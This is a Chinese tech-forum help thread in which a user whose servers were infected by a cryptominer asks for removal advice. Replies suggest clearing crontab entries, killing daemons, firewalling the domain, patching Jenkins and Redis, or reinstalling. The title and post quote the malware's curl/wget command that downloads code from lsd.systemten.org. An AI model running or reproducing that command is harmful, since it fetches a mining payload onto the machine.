问答 服务器中了挖矿病毒,curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org,求解决办法

咸吃萝卜淡操心 · 2019年09月09日 · 最后由 sitven 回复于 2019年11月19日 · 3243 次阅读

内网服务器中了挖矿病毒 curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org
使用网上教程

https://www.cnblogs.com/kobexffx/p/11000337.html 依然不能解决问题

大家有啥好的解决办法么,现在除了重装系统 我想不到其他好的办法了😂 😂 😂

共收到 9 条回复 时间 点赞

防火墙限制域名访问,限制端口访问

你先看 crontab -l 里面有没有定时任务,如果有先删了,然后去找进程,看下有没有守护进程,如果有先杀,杀完以后在下次检查前删除脚本,脚本复制下来当备忘,应该就杀干净了
顺带记得提高 redis 的安全性,这玩意儿经常被 arp 打
别的改了什么就恢复什么就行了= =反正中毒挺蛋疼的

向导 回复

直接重装了,比较蛋疼,杀了几遍了还是没弄干净,配置低的服务器直接就进不去了,最后就是想办法把文件 cp 出来重装了

我就是照着这个做的,但是没杀干净

那就不知道了,哈哈,挖矿很难搞

遇到过,没杀干净,最后备份数据重做系统了,你们那台服务器装了 jenkins 么。。。我们中挖矿病毒是因为 jenkins 老版本安全漏洞。。

守望@天空~ 回复

jenkins redis 都有 哈哈哈,反正除了一台 mac 和一台 win 其他的 5 台 centos 系统的服务器全都挂了

需要 登录 后方可回复, 如果你还没有账号请点击这里 注册